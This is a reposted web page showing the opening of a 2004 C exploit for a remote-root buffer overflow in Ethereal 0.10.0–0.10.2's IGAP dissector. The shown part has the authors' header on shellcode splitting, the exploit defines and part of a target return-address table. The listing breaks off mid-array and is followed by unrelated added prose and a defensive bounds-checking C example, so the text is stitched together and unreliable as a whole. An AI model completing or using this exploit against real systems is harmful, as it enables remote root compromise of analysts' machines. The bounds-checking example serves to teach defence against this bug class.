Overflow code: Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit
Author: unknown    Source: collected from the web    Hits:    Updated: 2006-3-29 15:20:24
/*
 * THE EYE ON SECURITY RESEARCH GROUP - INDIA
 * Ethereal IGAP Dissector Message Overflow Remote Root exploit
 *
 * Copyright 2004 - EOS-India Group
 *
 * Authors note:
 * Shellcode splitting technique:
 * Due to difficulty involved while following normal exploitation techniques due to shortage of memory space
 * for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode
 * is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which
 * jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode
 * requires EBP to contain a usuable stack address, we overwrite saved EBP also.
 *
 * Disclaimer:
 * This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot
 * be held responsible for any damage caused due to misuse of this code.
 * This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to
 * Ethereal 0.10.2.
 *
 * Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]
 * http://www.eos-india.net
 *
 */

#define IPPROTO_IGAP    0x02    // IPPROTO_IGMP=0x02
#define PAYLOAD_SIZE    (255-64)
#define MAX_BUFF        sizeof(struct igap_header)+sizeof(struct ipheader)
#define EXP             "Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"
#define VER             "0.2"
#define SOCKET_ERROR    -1
#define MAX_PACKET      10
#define RETOFFSET       76
#define SRC_IP          "192.31.33.7"

#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>

#define MAX_ARCH        5

struct eos {
    char *arch;
    unsigned long ret;
} targets[] = {
    "tEthereal(0.10.2)-Gentoo(gdb)", 0xbffede50,
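The bug class this listing targets is a protocol dissector copying a length-prefixed message into a fixed-size buffer without checking the claimed length against either the frame or the destination. The following is an added illustration of the defensive pattern, not Ethereal's IGAP dissector and not code from the listing above: the field layout (one length byte followed by the message), the buffer size MSG_MAX and the sample frames are all constructed assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define MSG_MAX 64   /* assumed fixed-size dissector buffer; not the real Ethereal size */

/* Bounded parse of a hypothetical length-prefixed message field:
 * byte 0 = claimed length, bytes 1..n = message bytes.
 * Returns the number of bytes copied into out, or -1 if the frame is rejected.
 * Both checks matter: the length byte is attacker-controlled, so it must be
 * bounded by what the frame actually carries and by the destination size. */
int parse_message_safe(const uint8_t *pkt, size_t pkt_len, char *out, size_t out_sz)
{
    if (pkt == NULL || out == NULL || out_sz == 0 || pkt_len < 1)
        return -1;
    size_t claimed = pkt[0];
    if (claimed > pkt_len - 1)      /* length byte promises more than the frame holds */
        return -1;
    if (claimed >= out_sz)          /* would not fit the destination plus its NUL */
        return -1;
    memcpy(out, pkt + 1, claimed);
    out[claimed] = '\0';
    return (int)claimed;
}

static char g_out[MSG_MAX];

/* Constructed sample frames (not captured traffic) exercising each branch:
 * 0 = well-formed, 1 = length exceeds frame, 2 = length exceeds buffer, 3 = empty frame. */
int run_sample(int id)
{
    static const uint8_t ok[]        = { 5, 'h', 'e', 'l', 'l', 'o' };
    static const uint8_t truncated[] = { 200, 'a', 'b' };
    uint8_t oversized[1 + MSG_MAX + 6];
    memset(oversized, 'A', sizeof oversized);
    oversized[0] = (uint8_t)(MSG_MAX + 6);   /* claims 70 bytes for a 64-byte buffer */

    memset(g_out, 0, sizeof g_out);
    switch (id) {
    case 0:  return parse_message_safe(ok, sizeof ok, g_out, sizeof g_out);
    case 1:  return parse_message_safe(truncated, sizeof truncated, g_out, sizeof g_out);
    case 2:  return parse_message_safe(oversized, sizeof oversized, g_out, sizeof g_out);
    default: return parse_message_safe(ok, 0, g_out, sizeof g_out);
    }
}

/* Message left by the most recent run_sample() call. */
const char *last_message(void)
{
    return g_out;
}

int main(void)
{
    for (int i = 0; i < 4; i++) {
        int r = run_sample(i);
        printf("sample %d -> %d%s%s\n", i, r, r >= 0 ? " message=" : " rejected", r >= 0 ? last_message() : "");
    }
    return 0;
}
```

The second check (claimed length against the destination) is the one an unchecked dissector typically omits; the first check alone would still let a short frame with a large length byte read past the packet.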